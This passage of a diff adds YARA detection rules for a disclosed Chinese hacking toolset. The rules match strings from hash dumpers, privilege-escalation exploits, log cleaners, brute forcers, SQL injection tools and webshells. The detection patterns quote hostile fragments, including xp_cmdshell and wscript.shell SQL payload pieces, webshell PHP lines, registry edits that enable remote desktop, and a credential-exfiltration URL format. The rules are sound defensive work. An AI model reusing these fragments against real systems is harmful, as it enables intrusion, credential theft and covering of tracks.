+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii
+      $s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii
+      $s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 87KB and 2 of them
+}
+
+rule CN_Honker_hashq_Hashq_RID2F30 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:46:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Hashq.exe" fullword wide
+      $s5 = "CnCert.Net" fullword wide
+      $s6 = "Md5 query tool" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule CN_Honker_exp_win2003_RID2E86 : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:18:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+      $s2 = "The shell \"cmd\" success!" fullword ascii
+      $s4 = "Not Windows NT family OS." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule CN_Honker_CnCerT_CCdoor_CMD_2_RID3143 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:15:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cmd.dll" fullword wide
+      $s1 = "cmdpath" fullword ascii
+      $s2 = "Get4Bytes" fullword ascii
+      $s3 = "ExcuteCmd" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 22KB and all of them
+}
+
+rule CN_Honker_exp_ms11046_RID2E4F : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:09:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[*] Token system command" fullword ascii
+      $s1 = "[*] command add user 90sec 90sec" fullword ascii
+      $s2 = "[*] Add to Administrators success" fullword ascii
+      $s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule CN_Honker_Master_beta_1_7_RID3054 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:35:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://seo.chinaz.com/?host=" fullword ascii
+      $s2 = "Location: getpass.asp?info=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 312KB and all of them
+}
+
+rule CN_Honker_F4ck_Team_f4ck_2_RID304D : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:34:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "F4ck.exe" fullword wide
+      $s2 = "@Netapi32.dll" fullword ascii
+      $s3 = "Team.F4ck.Net" fullword wide
+      $s8 = "Administrators" fullword ascii
+      $s9 = "F4ck Team" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+}
+
+rule CN_Honker_sig_3389_80_AntiFW_RID308F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:45:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Set TS to port:80 Successfully!" fullword ascii
+      $s2 = "Now,set TS to port 80" fullword ascii
+      $s3 = "echo. >>amethyst.reg" fullword ascii
+      $s4 = "del amethyst.reg" fullword ascii
+      $s5 = "AntiFW.cpp" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 2 of them
+}
+
+rule CN_Honker_wwwscan_gui_RID2F75 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:58:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+      $s2 = "/eye2007Admin_login.aspx" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 280KB and all of them
+}
+
+rule CN_Honker_SwordCollEdition_RID312C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:11:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "YuJianScan.exe" fullword wide
+      $s1 = "YuJianScan" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 225KB and all of them
+}
+
+rule CN_Honker_HconSTFportable_RID3095 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:46:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "HconSTFportable.exe" fullword wide
+      $s2 = "www.Hcon.in" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 354KB and all of them
+}
+
+rule CN_Honker_cleaniis_RID2E0F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:58:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii
+      $s4 = "IIS log file cleaner by Scurt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker_arp3_7_arp3_7_RID2F3E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:48:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "CnCerT.Net.SKiller.exe" fullword wide
+      $s2 = "www.80sec.com" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+}
+
+rule CN_Honker_exp_ms11080_RID2E4D : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:08:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "[*] command add user 90sec 90sec" fullword ascii
+      $s6 = "[*] Add to Administrators success" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 840KB and all of them
+}
+
+rule CN_Honker_Injection_transit_RID31CE : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:38:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<description>Your app description here</description> " fullword ascii
+      $s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide
+      $s5 = "ScriptnackgBun" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3175KB and all of them
+}
+
+rule CN_Honker_NBSI_3_0_RID2D14 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:16:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+      $s2 = "http://localhost/1.asp?id=16" fullword ascii
+      $s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide
+      $s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2600KB and 2 of them
+}
+
+rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_2_0_RID3418 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:15:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+      $s3 = "Create %d IP@Loginl;Password" fullword ascii
+      $s15 = "UBrute.com" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 980KB and 2 of them
+}
+
+rule CN_Honker_hkmjjiis6_RID2E56 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:10:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s14 = "* FROM IIsWebInfo/r" fullword ascii
+      $s19 = "ltithread4ck/" fullword ascii
+      $s20 = "LookupAcc=Sid#" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 175KB and all of them
+}
+
+rule CN_Honker_clearlogs_RID2E83 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:17:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" fullword ascii
+      $s4 = "Error: Unable to clear log - " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 140KB and all of them
+}
+
+rule CN_Honker_no_net_priv_esc_AddUser_RID340B : CHINA DEMO EXE FILE HKTL T1136 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:13:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1136"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PECompact2" fullword ascii
+      $s1 = "adduser" fullword ascii
+      $s5 = "OagaBoxA" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 115KB and all of them
+}
+
+rule CN_Honker_Injection_RID2E6A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:13:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii
+      $s7 = "jmPost.asp" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and all of them
+}
+
+rule CN_Honker_SQLServer_inject_Creaked_RID3418 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:15:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://localhost/index.asp?id=2" fullword ascii
+      $s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8110KB and all of them
+}
+
+rule CN_Honker_WebScan_WebScan_RID306C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:39:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wwwscan.exe" fullword wide
+      $s2 = "WWWScan Gui" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and all of them
+}
+
+rule CN_Honker_GetHashes_2_RID2ED4 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:31:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii
+      $s2 = "GetHashes.exe $Local" fullword ascii
+      $s3 = "The system key doesn't match SAM registry file!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+}
+
+rule CN_Honker_Tuoku_script_oracle_2_RID3339 : CHINA DEMO HKTL SCRIPT {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:38:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "webshell" fullword ascii
+      $s1 = "Silic Group Hacker Army " fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_net_packet_capt_RID30EC : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:00:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "(*.sfd)" fullword ascii
+      $s2 = "GetLaBA" fullword ascii
+      $s3 = "GAIsProcessorFeature" fullword ascii
+      $s4 = "- Gablto " ascii
+      $s5 = "PaneWyedit" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them
+}
+
+rule CN_Honker_CleanIISLog_RID2EB1 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:25:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker_HASH_pwhash_RID2ED5 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:31:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii
+      $s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+}
+
+rule CN_Honker_SqlMap_Python_Run_RID318A : CHINA DEMO EXE FILE HKTL SCRIPT T1059_006 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Run.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:26:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, SCRIPT, T1059_006"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".\\Run.log" fullword ascii
+      $s2 = "[root@Hacker~]# Sqlmap " fullword ascii
+      $s3 = "%sSqlmap %s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them
+}
+
+rule CN_Honker_SAMInside_RID2E04 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:56:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "www.InsidePro.com" fullword wide
+      $s1 = "SAMInside.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 650KB and all of them
+}
+
+rule CN_Honker_WebScan_wwwscan_RID30D3 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:56:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+      $s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+      $s3 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule CN_Honker_PHP_php11_RID2DB8 : CHINA DEMO HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file php11.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:43:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii
+      $s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii
+      $s3 = "echo '[cPanel Found] '.$login.':'.$pass.\"  Success\\n\";" fullword ascii
+   condition: 
+      filesize < 800KB and all of them
+}
+
+rule CN_Honker_WebCruiserWVS_RID2FC2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:10:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii
+      $s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and all of them
+}
+
+rule CN_Honker_Hookmsgina_RID2ED7 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:31:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii
+      $s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii
+      $s3 = "Global\\WinlogonHack_Load%u" fullword ascii
+      $s4 = "Hookmsgina.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule CN_Honker_sig_3389_xp3389_RID2F5E : CHINA DEMO EXE FILE HKTL T1050 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:54:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii
+      $s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii
+      $s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and all of them
+}
+
+rule CN_Honker_CookiesView_RID2F2F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:46:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "V1.0  Http://www.darkst.com Code:New4" fullword ascii
+      $s1 = "maotpo@126.com" fullword ascii
+      $s2 = "www.baidu.com" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 640KB and all of them
+}
+
+rule CN_Honker_ScanHistory_RID2F3E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:48:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ScanHistory.exe" fullword wide
+      $s2 = ".\\Report.dat" fullword wide
+      $s3 = "select  * from  Results order by scandate desc" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker_InvasionErasor_RID307A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:41:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c:\\windows\\system32\\config\\*.*" fullword wide
+      $s2 = "c:\\winnt\\*.txt" fullword wide
+      $s3 = "Command1" fullword ascii
+      $s4 = "Win2003" fullword ascii
+      $s5 = "Win 2000" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule CN_Honker_super_Injection1_RID3129 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:10:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
